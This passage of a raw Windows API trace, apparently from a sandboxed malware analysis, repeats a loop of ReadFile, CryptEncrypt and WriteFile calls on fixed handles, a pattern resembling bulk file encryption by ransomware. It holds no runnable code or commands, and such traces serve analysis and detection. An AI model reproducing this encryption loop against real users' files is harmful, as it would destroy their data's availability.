lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.807] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.808] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.809] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.810] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.811] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.812] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.812] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.812] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.812] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.813] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.813] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.813] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.813] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.814] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, 